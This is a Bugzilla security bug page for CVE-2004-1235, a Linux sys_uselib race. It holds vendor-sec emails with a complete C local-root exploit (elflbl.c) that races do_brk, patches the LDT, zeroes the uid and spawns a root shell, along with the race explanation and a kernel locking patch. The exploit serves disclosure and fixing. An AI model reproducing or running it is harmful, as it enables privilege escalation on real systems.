Bugzilla – Bug 64492
VUL-0: CVE-2004-1235: ELF sys_uselib VMA race condition local root
Last modified: 2021-10-19 14:00:36 UTC
Date: Wed, 22 Dec 2004 16:40:14 +0100 (CET) From: Paul Starzetz <ihaquer@isec.pl> Reply-To: security@isec.pl To: vendor-sec <vendor-sec@lst.de> Subject: [vendor-sec] Merry Christmas -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi a special present for all members of vendorsec :-] This issue seems to be present also in 2.4.29-rc2. Merry Christmas. /* * binfmt_elf uselib VMA insert race vulnerability * v1.05 * * gcc -O2 -fomit-frame-pointer elflbl.c -o elflbl * * Copyright (c) 2004 iSEC Security Research. All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * */ #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <errno.h> #include <sched.h> #include <syscall.h> #include <limits.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/time.h> #include <sys/mman.h> #include <sys/sysinfo.h> #include <linux/elf.h> #include <linux/linkage.h> #include <asm/page.h> #include <asm/ldt.h> #include <asm/segment.h> #define str(s) #s #define xstr(s) str(s) #define MREMAP_MAYMOVE 1 // temp lib location #define LIBNAME "/dev/shm/_elf_lib" // shell name #defineSHELL "/bin/bash" // time delta to detect race #define RACEDELTA 5000 // if you have more deadbebes in memory, change this #define MAGIC 0xdeadbabe // do not touch #defineSLAB_THRSH 128 #defineSLAB_PER_CHLD (INT_MAX - 1) #define LIB_SIZE ( PAGE_SIZE * 4 ) #define STACK_SIZE ( PAGE_SIZE * 4 ) #define LDT_PAGES ( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE ) #define ENTRY_GATE ( LDT_ENTRIES-1 ) #define GATESEL( (ENTRY_GATE<<3)|0x07 ) #define kB * 1024 #define MB * 1024 kB #define GB * 1024 MB #define TMPLEN 256 #define PGD_SIZE ( PAGE_SIZE*1024 ) extern char **environ; static char cstack[STACK_SIZE]; static char name[TMPLEN]; static char line[TMPLEN]; static volatile int val = 0, go = 0, finish = 0, scnt = 0, old_esp = 0, delta = 0, map_flags = PROT_WRITE|PROT_READ; static int fstop=0, brute=0, ccnt=0, pidx, pnum=0, smp=4, cpid, uid, task_size, old_esp, lib_addr, map_count=0, map_base, map_addr, addr_min, addr_max, vma_start, vma_end, max_page; static struct timeval tm1, tm2; static char *myenv[] = {"TERM=vt100", "HISTFILE=/dev/null", NULL}; static char *pagemap; #define __NR_sys_gettimeofday __NR_gettimeofday #define __NR_sys_sched_yield __NR_sched_yield #define __NR_sys_madvise __NR_madvise #define __NR_sys_uselib__NR_uselib #define __NR_sys_mmap2 __NR_mmap2 #define __NR_sys_munmap__NR_munmap #define __NR_sys_mprotect __NR_mprotect #define __NR_sys_mremap__NR_mremap inline _syscall6(int, sys_mmap2, int, a, int, b, int, c, int, d, int, e, int, f); inline _syscall5(int, sys_mremap, int, a, int, b, int, c, int, d, int, e); inline _syscall3(int, sys_madvise, void*, a, int, b, int, c); inline _syscall3(int, sys_mprotect, int, a, int, b, int, c); inline _syscall3( int, modify_ldt, int, func, void *, ptr, int, bytecount ); inline _syscall2(int, sys_gettimeofday, void*, a, void*, b); inline _syscall2(int, sys_munmap, int, a, int, b); inline _syscall1(int, sys_uselib, char*, l); inline _syscall0(void, sys_sched_yield); inline int tmdiff(struct timeval *t1, struct timeval *t2) { int r; r=t2->tv_sec - t1->tv_sec; r*=1000000; r+=t2->tv_usec - t1->tv_usec; return r; } void fatal(const char *message, int critical) { int sig = critical? SIGSTOP : (fstop? SIGSTOP : SIGKILL); if(!errno) { fprintf(stdout, "\n[-] FAILED: %s ", message); } else { fprintf(stdout, "\n[-] FAILED: %s (%s) ", message, (char*) (strerror(errno)) ); } if(critical) printf("\nCRITICAL, entering endless loop"); printf("\n"); fflush(stdout); unlink(LIBNAME); kill(cpid, SIGKILL); for(;;) kill(0, sig); } tatic int raceme(void* v) { int r; printf("\n[+] exploit thread running pid=%d", getpid() ); fflush(stdout); finish=1; for(;;) { errno = 0; // check if raced: recheck: if(!go) sys_sched_yield(); sys_gettimeofday(&tm2, NULL); delta = tmdiff(&tm1, &tm2); if(delta < RACEDELTA) goto recheck; // check if lib VMAs exist as expected under race condition recheck2: r = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL); if(r) continue; errno = 0; r = sys_madvise((void*) (lib_addr+PAGE_SIZE), LIB_SIZE-PAGE_SIZE, MADV_NORMAL); if(!r || (r<0 && errno != ENOMEM) ) continue; // SMP? if(smp-->=0) goto recheck2; // recheck race if(!go) continue; finish++; // we need to free one vm_area_struct for mmap to work r = sys_mprotect(map_addr, PAGE_SIZE, map_flags); if(r) fatal("mprotect", 0); r = sys_mmap2(lib_addr + PAGE_SIZE*2, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(-1 == r) fatal("mmap2 race", 0); printf("\n[+] race delta=%d maps=%d", delta, map_count); fflush(stdout); _exit(0); } return 0; } // get uid=0 kernel code (stolen from cliph) asmlinkage void kernel_code(unsigned *task) { unsigned *addr = task; // find & reset uids while(addr[0] != uid || addr[1] != uid || addr[2] != uid || addr[3] != uid) addr++; addr[0] = /*addr[1] = */addr[2] = addr[3] = 0; addr[4] = addr[5] = addr[6] = addr[7] = 0; // find & correct VMA for(addr=(unsigned *)task_size; (unsigned)addr<addr_min; addr++) { if(addr[0] >= task_size && addr[1] == vma_start && addr[2] == vma_end && addr[3] >= task_size ) { addr[1] = task_size - PAGE_SIZE; addr[2] = task_size; break; } } } void kcode(void); void __kcode(void) { asm( "kcode: \n" " pusha \n" " pushl %es \n" " pushl %ds \n" " movl $("xstr(__KERNEL_DS)") ,%edx \n" " movl %edx,%es\n" " movl %edx,%ds\n" " movl $0xffffe000,%eax\n" " andl %esp,%eax \n" " pushl %eax \n" " call kernel_code \n" " addl $4, %esp\n" " popl %ds \n" " popl %es \n" " popa \n" " lret \n" ); } void static sigfailed(int v) { ccnt++; fatal("lcall", 1); } // modify LDT & exec void try_to_exploit(unsigned addr) { volatile int r, *v; printf("\n[!] try to exploit 0x%.8x", addr); fflush(stdout); r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC); if(r) fatal("mprotect 1", 1); // check if really LDT v = (void*) (addr + (ENTRY_GATE*LDT_ENTRY_SIZE % PAGE_SIZE) ); signal(SIGSEGV, sigfailed); r = *v; if(r != MAGIC) { printf("\n[-] FAILED val = 0x%.8x", r); fflush(stdout); fatal("find LDT", 1); } // yeah! *v = ((unsigned)__KERNEL_CS << 16) | ((unsigned)kcode & 0xffffU); *(v+1) = ((unsigned)kcode & ~0xffffU) | 0xec00U; printf("\n[+] SUCCESS (LDT found v=0x%.8x)", *v); fflush(stdout); // reprotect to get one VMA r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_EXEC); if(r) fatal("mprotect 2", 1); // CPL0 transition asm("lcall $" xstr(GATESEL) ",$0x0"); if( getuid()==0 ) { printf("\n[+] exploited, uid=0\n" ); fflush(stdout); } else { printf("\n[-] uid change failed" ); fflush(stdout); sigfailed(0); } signal(SIGTERM, SIG_IGN); kill(0, SIGTERM); execl(SHELL, "sh", NULL); fatal("execl", 0); } void static scan_mm_finish(); void static scan_mm_start(); // kernel page table scan code void static scan_mm() { map_addr -= PAGE_SIZE; if(map_addr <= addr_min) scan_mm_start(); scnt=0; val = *(int*)map_addr; scan_mm_finish(); } void static scan_mm_finish() { retry: __asm__("movl %0, %%esp" : :"m"(old_esp) ); if(scnt) { pagemap[pidx] ^= 1; } else { sys_madvise((void*)map_addr, PAGE_SIZE, MADV_DONTNEED); } pidx--; scan_mm(); goto retry; } // make kernel page maps before and after allocating LDT void static scan_mm_start() { static int npg=0; static struct modify_ldt_ldt_s l; static struct sysinfo si; pnum++; if(pnum==1) { sysinfo(&si); addr_min = task_size + si.totalram; addr_min = (addr_min + PGD_SIZE - 1) & ~(PGD_SIZE-1); addr_max = addr_min + si.totalram; if(addr_max >= 0xffffe000 || addr_max < addr_min) addr_max = 0xffffd000; printf("\n[+] vmalloc area 0x%.8x - 0x%.8x", addr_min, addr_max); max_page = (addr_max - addr_min) / PAGE_SIZE; pagemap = malloc( max_page + 32 ); if(!pagemap) fatal("malloc pagemap", 1); memset(pagemap, 0, max_page + 32); pidx = max_page-1; } else if(pnum==2) { memset(&l, 0, sizeof(l)); l.entry_number = LDT_ENTRIES-1; l.seg_32bit = 1; l.base_addr = MAGIC >> 16; l.limit = MAGIC & 0xffff; l.limit_in_pages = 1; if( modify_ldt(1, &l, sizeof(l)) != 0 ) fatal("modify_ldt", 1); pidx = max_page-1; } else if(pnum==3) { npg=0; for(pidx=0; pidx<=max_page-1; pidx++) { if(pagemap[pidx]) { npg++; fflush(stdout); } else if(npg == LDT_PAGES) { npg=0; try_to_exploit(addr_min + (pidx-1)*PAGE_SIZE); } else { npg=0; } } fatal("find LDT", 1); } // save context & scan page table __asm__("movl %%esp, %0" : :"m"(old_esp) ); map_addr = addr_max; scan_mm(); } // return number of available SLAB objects in cache static int get_slab_objs(const char *sn) { static int c, d, u = 0, a = 0; FILE *fp=NULL; fp = fopen("/proc/slabinfo", "r"); if(!fp) fatal("get_slab_objs: fopen", 0); fgets(name, sizeof(name) - 1, fp); do { c = u = a = -1; if (!fgets(line, sizeof(line) - 1, fp)) break; c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d, &d); } while (strcmp(name, sn)); close(fileno(fp)); fclose(fp); return c == 7 ? a - u : -1; } // leave one object in the SLAB inline void prepare_slab() { int *r; map_addr -= PAGE_SIZE; map_count++; map_flags ^= PROT_READ; r = (void*)sys_mmap2((unsigned)map_addr, PAGE_SIZE, map_flags, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0 ); if(MAP_FAILED == r) { fatal("try again", 0); } *r = map_addr; } // sig handlers void static segvcnt(int v) { scnt++; scan_mm_finish(); } void static reaper(int v) { ccnt++; waitpid(0, &v, WNOHANG|WUNTRACED); } // use elf library and try to sleep on kmalloc void exploitme() { int r, sz; printf("\n cat /proc/%d/maps", getpid() ); fflush(stdout); signal(SIGCHLD, reaper); signal(SIGSEGV, segvcnt); signal(SIGBUS, segvcnt); // helper clone finish=0; ccnt=0; sz = sizeof(cstack) / sizeof(cstack[0]); cpid = clone(&raceme, (void*) &cstack[sz-16], CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD, NULL ); if(-1==cpid) fatal("clone", 0); // synchronize threads while(!finish) sys_sched_yield(); finish=0; // try to hit the kmalloc race for(;;) { r = get_slab_objs("vm_area_struct"); while(r != 1) { prepare_slab(); r--; } sys_gettimeofday(&tm1, NULL); go = 1; r=sys_uselib(LIBNAME); go = 0; if(r) fatal("uselib", 0); if(finish) break; // wipe lib VMAs and try again r = sys_munmap(lib_addr, LIB_SIZE); if(-1==r || ccnt) goto failed; } // seems we raced r = sys_munmap(map_addr, map_base-map_addr + PAGE_SIZE); if(r) fatal("munmap 1", 0); r = sys_munmap(lib_addr, PAGE_SIZE); if(r) fatal("munmap 2", 0); // write protect brk VMA to fool vm_enough_memory() r = sys_mprotect((lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE, PROT_READ|PROT_EXEC); if(-1==r) fatal("mprotect brk", 0); // this will finally make the big VMA... sz = (0-lib_addr) - LIB_SIZE - PAGE_SIZE; expand: r = sys_madvise((void*)(lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE, MADV_NORMAL); if(r) fatal("madvise", 0); r = sys_mremap(lib_addr + LIB_SIZE-PAGE_SIZE, PAGE_SIZE, sz, MREMAP_MAYMOVE, 0); if(-1==r) { if(0==sz) fatal("mremap: expand VMA", 0); else { sz -= PAGE_SIZE; goto expand; } } vma_start = lib_addr + PAGE_SIZE; vma_end = vma_start + sz + 2*PAGE_SIZE; // try to figure kernel layout printf("\n expanded VMA (0x%.8x-0x%.8x)", vma_start, vma_end); fflush(stdout); scan_mm_start(); failed: fatal("try again", 0); } // make fake ELF library static void make_lib() { struct elfhdr eh; struct elf_phdr eph; static char tmpbuf[PAGE_SIZE]; int fd; // make our elf library umask(022); unlink(LIBNAME); fd=open(LIBNAME, O_RDWR|O_CREAT|O_TRUNC, 0755); if(fd<0) fatal("open lib", 0); memset(&eh, 0, sizeof(eh) ); // elf exec header memcpy(eh.e_ident, ELFMAG, SELFMAG); eh.e_type = ET_EXEC; eh.e_machine = EM_386; eh.e_phentsize = sizeof(struct elf_phdr); eh.e_phnum = 1; eh.e_phoff = sizeof(eh); write(fd, &eh, sizeof(eh) ); // section header: memset(&eph, 0, sizeof(eph) ); eph.p_type = PT_LOAD; eph.p_offset = 4096; eph.p_filesz = 4096; eph.p_vaddr = lib_addr; eph.p_memsz = LIB_SIZE; eph.p_flags = PF_W|PF_R|PF_X; write(fd, &eph, sizeof(eph) ); // execable code lseek(fd, 4096, SEEK_SET); memset(tmpbuf, 0x90, sizeof(tmpbuf) ); write(fd, &tmpbuf, sizeof(tmpbuf) ); close(fd); } // move stack down #2 void prepare_finish() { int r; old_esp &= ~(PAGE_SIZE-1); old_esp -= PAGE_SIZE; task_size = ((unsigned)old_esp + 1 GB ) / (1 GB) * 1 GB; r = sys_munmap(old_esp, task_size-old_esp); if(r) fatal("unmap stack", 0); // setup rt env uid = getuid(); lib_addr = task_size - LIB_SIZE - PAGE_SIZE; map_base = map_addr = (lib_addr - PGD_SIZE) & ~(PGD_SIZE-1); printf("\n[+] moved stack %x, task_size=%x, map_base=%x", old_esp, task_size, map_base); fflush(stdout); make_lib(); exploitme(); } // move stack down #1 void prepare() { unsigned p=0; environ = myenv; p = sys_mmap2( 0, STACK_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0 ); if(-1==p) fatal("mmap2 stack", 0); p += STACK_SIZE - 64; __asm__("movl %%esp, %0 \n" "movl %1, %%esp \n" : : "m"(old_esp), "m"(p) ); prepare_finish(); } void static chldcnt(int v) { ccnt++; } // alloc slab objects... inline void do_wipe() { int *r, c=0, left=0; __asm__("movl %%esp, %0" : : "m"(old_esp) ); old_esp = (old_esp - PGD_SIZE) & ~(PGD_SIZE-1); for(;;) { if(left<=0) left = get_slab_objs("vm_area_struct"); if(left <= SLAB_THRSH) break; left--; map_flags ^= PROT_READ; old_esp -= PAGE_SIZE; r = (void*)sys_mmap2(old_esp, PAGE_SIZE, map_flags, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0 ); if(MAP_FAILED == r) break; c++; if(c>SLAB_PER_CHLD) break; if( (c%1024)==0 ) { printf("\rchild %d %d", val, c); fflush(stdout); } } kill(getppid(), SIGUSR1); for(;;) pause(); } void wipe_slab() { signal(SIGUSR1, chldcnt); for(;;) { ccnt=0; val++; cpid = fork(); if(!cpid) { printf("\n"); do_wipe(); } pause(); if( get_slab_objs("vm_area_struct") <= SLAB_THRSH ) break; sys_sched_yield(); } printf("\n"); signal(SIGUSR1, SIG_DFL); } void usage(char *n) { printf("\nUsage: %s\t-s forced stop\n", n); printf("\t\t-n SMP iterations\n"); printf("\t\t-b empty SLAB mode\n"); printf("\n"); _exit(1); } // give -s for forced stop, -b to clean SLAB int main(int ac, char **av) { int r; while(ac) { r = getopt(ac, av, "bsn:"); if(r<0) break; switch(r) { case 's' : fstop = 1; break; case 'n' : smp = atoi(optarg); if(smp<0) fatal("bad value", 0); break; case 'b' : brute = 1; break; default: usage(av[0]); break; } } uid = getuid(); setpgrp(); if(brute) wipe_slab(); prepare(); return 0; } - -- Paul Starzetz iSEC Security Research http://isec.pl/
<!-- SBZ_reproduce --> There was no correct description, only this exploit.
Maybe Andrea can also have a look how this could be fixed. Btw did you try the exploit on one of our kernels?
No I didnt, It just arrived. There have been reports that it doesnt work with gcc 3.x compilers and that it crashes some kernels.
Date: Wed, 22 Dec 2004 21:28:43 +0100 (CET) From: Paul Starzetz <ihaquer@isec.pl> To: Solar Designer <solar@openwall.com> Cc: security@isec.pl, vendor-sec <vendor-sec@lst.de> Subject: Re: [vendor-sec] Merry Christmas On Wed, 22 Dec 2004, Solar Designer wrote: > -ow patched kernels with CONFIG_BINFMT_ELF_AOUT not set (default) are > not vulnerable, correct? :-) it seems that also a.out's uselib and maybe others are vuln. -- Paul Starzetz iSEC Security Research http://isec.pl/
Date: Wed, 22 Dec 2004 21:54:09 +0100 (CET) From: Paul Starzetz <ihaquer@isec.pl> To: Solar Designer <solar@openwall.com> Cc: security@isec.pl, vendor-sec <vendor-sec@lst.de> Subject: Re: [vendor-sec] Merry Christmas On Wed, 22 Dec 2004, Solar Designer wrote: > Is there such a thing? I only see one sys_uselib() in exec.c, and > it's not compiled in with our patches by default. It's obsolete. I'm talking about: static int load_aout_library(struct file *file) { struct inode * inode; unsigned long bss, start_addr, len; unsigned long error; int retval; struct exec ex; inode = file->f_dentry->d_inode; retval = -ENOEXEC; error = kernel_read(file, 0, (char *) &ex, sizeof(ex)); . . . -- Paul Starzetz iSEC Security Research http://isec.pl/
It did nothing on a SL 9.1, but this doesnt have to mean much. Due to missing explanation I dont know where the bug is yet.
Well, we have quite some additions and improvements in the VM of our kernels, so chances are we could be immune against the problem because it might be already fixed by Andrea's changes. This is why I would like him to take a look. He probably even understands what the exploit is actually doing ;)
You have the original email, so could you attach to bugzilla a working .c file or forward me the original email? Cut and pasting isn't working at all with konqueror.
I presume the exploited vma insertion is the one in load_elf_library: /* Now use mmap to map the library into memory. */ down_write(¤t->mm->mmap_sem); error = do_mmap(file, ELF_PAGESTART(elf_phdata->p_vaddr), (elf_phdata->p_filesz + ELF_PAGEOFFSET(elf_phdata->p_vaddr)), PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_PRIVATE | MAP_DENYWRITE, (elf_phdata->p_offset - ELF_PAGEOFFSET(elf_phdata->p_vaddr))); up_write(¤t->mm->mmap_sem); The above call is like an mmap, the kernel should be doing all the necessary checks internally to do_mmap. Perhaps the bug is that do_mmap isn't doing all necessary checks? I don't get why he's only posting a non-working exploit, instead of commenting of where's the bug is. He must know where is the real bug, or he wouldn't have been able to write a working exploit. I read the function one time and I don't see race conditions yet (reading the exploit it seems this is a race condition with threads involving sys_uselib and the code path of sys_uselib is strightforward until it calls load_elf_library). Even the kmalloc sleep shouldn't make a difference (despite he mentions a kmalloc sleep in his exploit). Our fs/binfmt_elf.c file is the same as 2.6.10-rc3 in this function so if it happens with 2.6.10-rc3 it should happen with our tree too if the problem is really the one he's talking about. CONFIG_BINFMT_ELF_AOUT doesn't exist in mainline and in our kernel, so I Solar's comment isn't clear. It would be nice to have the confirmation that this is reproducible and that he's not running a buggy kernel hacked by him while testing his program. Did you try with 2.4.29-rc2? Perhaps this is only a 2.4 bug (I only read 2.6 so far).
* This comment was added by mail. Date: Thu, 30 Dec 2004 15:48:35 +0100 (CET) From: Paul Starzetz <ihaquer@isec.pl> To: Marcelo Tosatti <marcelo.tosatti@cyclades.com> Cc: Josh Bressers <bressers@redhat.com>, security@isec.pl, vendor-sec <vendor-sec@lst.de>, Solar Designer <solar@openwall.com> Subject: Re: [vendor-sec] Merry Christmas On Wed, 29 Dec 2004, Marcelo Tosatti wrote: | Hi Paul, | | Can you describe whats going on at the kernel level? | | I really dont have the time to read and understand the exploit. Will take | some time to try it tomorrow. OK no prob, it was just too obvious for me. | | The problem is in the sys_uselib() system call to select shared library, | but what is the race scenario ? There is a missing down() on the current->mm->mmap_sem semaphore while calling do_brk(). As you see (for 2.4 as well for 2.6) there is a down/up_write pair before around do_mmap, but none around do_brk. And looking into the code of sys_brk it is clear that do_brk is called with the semaphore held. In other words: if do_brk() sleeps on kmalloc for the vm_area_struct it may insert the VMA in old place while the VMA list/tree has been modified by another thread. That is used by the exploit to create two overlapping VMAs like: [A.......B] VMA N [C...D] VMA N+1 then it exploits the features of mremap() that calculates the maximum possible address for extending a VMA by taking the next VMA and building the difference between the requested address and next's vm_start... but if this is less than the vm_end of the previous VMA this will result in a big integer, something like (unsigned)-1 & ~4093 etc... The remaining work is analogous to the do_brk exploit. Note that this is not a bug in mremap. I have found at least three different ways to exploit once we have overlapping VMAs... Attached latest version, never tested on gcc 3.x (however statically linked 2.95 version works on a gcc 3.x compiled kernel). May need to be run few times with -s -b switches.
Created attachment 27352 [details] elflbl_v106.c
* This comment was added by mail. Date: Fri, 31 Dec 2004 14:15:34 -0200 From: Marcelo Tosatti <marcelo.tosatti@cyclades.com> To: Paul Starzetz <ihaquer@isec.pl> Cc: Josh Bressers <bressers@redhat.com>, security@isec.pl, vendor-sec <vendor-sec@lst.de>, Solar Designer <solar@openwall.com>, Andrew Morton <akpm@osdl.org>, Chris Wright <chrisw@osdl.org> Subject: Re: [vendor-sec] Merry Christmas User-Agent: Mutt/1.5.5.1i X-Spam-Level: On Thu, Dec 30, 2004 at 03:48:35PM +0100, Paul Starzetz wrote: | On Wed, 29 Dec 2004, Marcelo Tosatti wrote: | | > Hi Paul, | > | > Can you describe whats going on at the kernel level? | > | > I really dont have the time to read and understand the exploit. Will take | > some time to try it tomorrow. | | OK no prob, it was just too obvious for me. Well wasnt for me :) | > The problem is in the sys_uselib() system call to select shared library, | > but what is the race scenario ? | | There is a missing down() on the current->mm->mmap_sem semaphore while | calling do_brk(). As you see (for 2.4 as well for 2.6) there is a | down/up_write pair before around do_mmap, but none around do_brk. And | looking into the code of sys_brk it is clear that do_brk is called with | the semaphore held. | | In other words: if do_brk() sleeps on kmalloc for the vm_area_struct it | may insert the VMA in old place while the VMA list/tree has been modified | by another thread. That is used by the exploit to create two overlapping | VMAs like: | | [A.......B] VMA N | [C...D] VMA N+1 | | then it exploits the features of mremap() that calculates the maximum | possible address for extending a VMA by taking the next VMA and building | the difference between the requested address and next's vm_start... but if | this is less than the vm_end of the previous VMA this will result in a big | integer, something like (unsigned)-1 & ~4093 etc... The remaining work is | analogous to the do_brk exploit. | | Note that this is not a bug in mremap. I have found at least three | different ways to exploit once we have overlapping VMAs... | | Attached latest version, never tested on gcc 3.x (however statically | linked 2.95 version works on a gcc 3.x compiled kernel). May need to be | run few times with -s -b switches. OK I see, thanks for the explanation. Here is a fix against 2.4.29-pre3 to create new do_brk() to grab the mmap_sem and call __do_brk (old do_brk()). This is much simpler than fixing each caller of do_brk - there are many in the binary format loaders (ELF and aout). Andrew, if you're OK with the addition of lockless __do_brk() and locking do_brk() as the following patch I can prepare a v2.6 patch. With this in place I can't crash my testbox anymore (it used to crash with Paul's exploit) - your exploit now eats all memory+swap and triggers OOM killer. diff -Nur linux-2.4.28.orig/arch/ia64/kernel/sys_ia64.c linux-2.4.28/arch/ia64/kernel/sys_ia64.c --- linux-2.4.28.orig/arch/ia64/kernel/sys_ia64.c 2004-12-31 15:21:15.117588248 -0200 +++ linux-2.4.28/arch/ia64/kernel/sys_ia64.c 2004-12-31 15:29:43.833251712 -0200 goto out; /* Ok, looks good - let it rip. */ - if (do_brk(oldbrk, newbrk-oldbrk) != oldbrk) + if (__do_brk(oldbrk, newbrk-oldbrk) != oldbrk) goto out; set_brk: mm->brk = brk; diff -Nur linux-2.4.28.orig/arch/mips/kernel/sysirix.c linux-2.4.28/arch/mips/kernel/sysirix.c --- linux-2.4.28.orig/arch/mips/kernel/sysirix.c 2004-12-31 15:21:15.292561648 -0200 +++ linux-2.4.28/arch/mips/kernel/sysirix.c 2004-12-31 15:30:03.311290600 -0200 * Ok, looks good - let it rip. */ mm->brk = brk; - do_brk(oldbrk, newbrk-oldbrk); + __do_brk(oldbrk, newbrk-oldbrk); ret = 0; out: diff -Nur linux-2.4.28.orig/arch/sparc/kernel/sys_sunos.c linux-2.4.28/arch/sparc/kernel/sys_sunos.c --- linux-2.4.28.orig/arch/sparc/kernel/sys_sunos.c 2004-12-31 15:21:15.389546904 -0200 +++ linux-2.4.28/arch/sparc/kernel/sys_sunos.c 2004-12-31 15:30:44.029100552 -0200 * Ok, we have probably got enough memory - let it rip. */ current->mm->brk = brk; - do_brk(oldbrk, newbrk-oldbrk); + __do_brk(oldbrk, newbrk-oldbrk); retval = 0; out: up_write(¤t->mm->mmap_sem); diff -Nur linux-2.4.28.orig/arch/sparc64/kernel/sys_sunos32.c linux-2.4.28/arch/sparc64/kernel/sys_sunos32.c --- linux-2.4.28.orig/arch/sparc64/kernel/sys_sunos32.c 2004-12-31 15:21:15.571519240 -0200 +++ linux-2.4.28/arch/sparc64/kernel/sys_sunos32.c 2004-12-31 15:31:24.532943032 -0200 goto out; /* Ok, we have probably got enough memory - let it rip. */ current->mm->brk = brk; - do_brk(oldbrk, newbrk-oldbrk); + __do_brk(oldbrk, newbrk-oldbrk); retval = 0; out: up_write(¤t->mm->mmap_sem); diff -Nur linux-2.4.28.orig/include/linux/mm.h linux-2.4.28/include/linux/mm.h --- linux-2.4.28.orig/include/linux/mm.h 2004-12-31 15:21:17.710194112 -0200 +++ linux-2.4.28/include/linux/mm.h 2004-12-31 15:25:20.494285320 -0200 extern int do_munmap(struct mm_struct *, unsigned long, size_t); +extern unsigned long __do_brk(unsigned long, unsigned long); extern unsigned long do_brk(unsigned long, unsigned long); static inline void __vma_unlink(struct mm_struct * mm, struct vm_area_struct * vma, struct vm_area_struct * prev) diff -Nur linux-2.4.28.orig/kernel/ksyms.c linux-2.4.28/kernel/ksyms.c --- linux-2.4.28.orig/kernel/ksyms.c 2004-12-31 15:21:15.782487168 -0200 +++ linux-2.4.28/kernel/ksyms.c 2004-12-31 15:32:30.574903128 -0200 /* process memory management */ EXPORT_SYMBOL(do_mmap_pgoff); EXPORT_SYMBOL(do_munmap); +EXPORT_SYMBOL(__do_brk); EXPORT_SYMBOL(do_brk); EXPORT_SYMBOL(exit_mm); EXPORT_SYMBOL(exit_files); diff -Nur linux-2.4.28.orig/mm/mmap.c linux-2.4.28/mm/mmap.c --- linux-2.4.28.orig/mm/mmap.c 2004-12-31 15:21:14.880624272 -0200 +++ linux-2.4.28/mm/mmap.c 2004-12-31 15:26:41.029042176 -0200 goto out; /* Ok, looks good - let it rip. */ - if (do_brk(oldbrk, newbrk-oldbrk) != oldbrk) + if (__do_brk(oldbrk, newbrk-oldbrk) != oldbrk) goto out; set_brk: mm->brk = brk; return ret; } + /* * this is really a simplified "do_mmap". it only handles * anonymous maps. eventually we may be able to do some * brk-specific accounting here. */ -unsigned long do_brk(unsigned long addr, unsigned long len) +unsigned long __do_brk(unsigned long addr, unsigned long len) { struct mm_struct * mm = current->mm; struct vm_area_struct * vma, * prev; return addr; } +/* locking version of __do_brk. */ +unsigned long do_brk(unsigned long addr, unsigned long len) +{ + unsigned long ret; + + down_write(¤t->mm->mmap_sem); + ret = __do_brk(addr, len); + up_write(¤t->mm->mmap_sem); + + return ret; +} + /* Build the RB tree corresponding to the VMA list. */ void build_mmap_rb(struct mm_struct * mm) { _______________________________________________ Vendor Security mailing list Vendor Security@lst.de https://www.lst.de/cgi-bin/mailman/listinfo/vendor-sec Date: Fri, 31 Dec 2004 20:57:06 +0100 (CET) From: Paul Starzetz <ihaquer@isec.pl> To: Marcelo Tosatti <marcelo.tosatti@cyclades.com> Cc: Josh Bressers <bressers@redhat.com>, vendor-sec <vendor-sec@lst.de>, Solar Designer <solar@openwall.com>, Andrew Morton <akpm@osdl.org>, Chris Wright <chrisw@osdl.org> Subject: Re: [vendor-sec] Merry Christmas X-Spam-Level: On Fri, 31 Dec 2004, Marcelo Tosatti wrote: | With this in place I can't crash my testbox anymore (it used to crash with Paul's | exploit) - your exploit now eats all memory+swap and triggers OOM killer. Well... actually it should give sh-2.05# you may try the binary from http://isec.pl/paul/love_krove.gif (no trojan ;-) -- Paul Starzetz iSEC Security Research http://isec.pl/ _______________________________________________ Vendor Security mailing list Vendor Security@lst.de https://www.lst.de/cgi-bin/mailman/listinfo/vendor-sec Date: Fri, 31 Dec 2004 14:36:27 -0800 From: Andrew Morton <akpm@osdl.org> To: Marcelo Tosatti <marcelo.tosatti@cyclades.com> Cc: ihaquer@isec.pl, bressers@redhat.com, security@isec.pl, vendor-sec@lst.de, solar@openwall.com, chrisw@osdl.org Subject: Re: [vendor-sec] Merry Christmas X-Mailer: Sylpheed version 0.9.7 (GTK+ 1.2.10; i386-redhat-linux-gnu) X-Spam-Level: Marcelo Tosatti <marcelo.tosatti@cyclades.com> wrote: | | Andrew, if you're OK with the addition of lockless __do_brk() and locking do_brk() | as the following patch I can prepare a v2.6 patch. OK... I'm a bit concerned that do_brk() is, for some reason, exported to modules. If someone is already taking mmap_sem prior to calling do_brk(), we've just gone and made them deadlock. So I think it would be better to leave do_brk unchanged and to introduce a new do_brk_unlocked() which takes mmap_sem then calls do_brk. _______________________________________________ Vendor Security mailing list Vendor Security@lst.de https://www.lst.de/cgi-bin/mailman/listinfo/vendor-sec Date: Sat, 1 Jan 2005 11:05:21 -0200 From: Marcelo Tosatti <marcelo.tosatti@cyclades.com> To: Andrew Morton <akpm@osdl.org> Cc: ihaquer@isec.pl, bressers@redhat.com, security@isec.pl, vendor-sec@lst.de, solar@openwall.com, chrisw@osdl.org Subject: Re: [vendor-sec] Merry Christmas User-Agent: Mutt/1.5.5.1i X-Spam-Level: On Fri, Dec 31, 2004 at 02:36:27PM -0800, Andrew Morton wrote: | Marcelo Tosatti <marcelo.tosatti@cyclades.com> wrote: | > | > Andrew, if you're OK with the addition of lockless __do_brk() and locking do_brk() | > 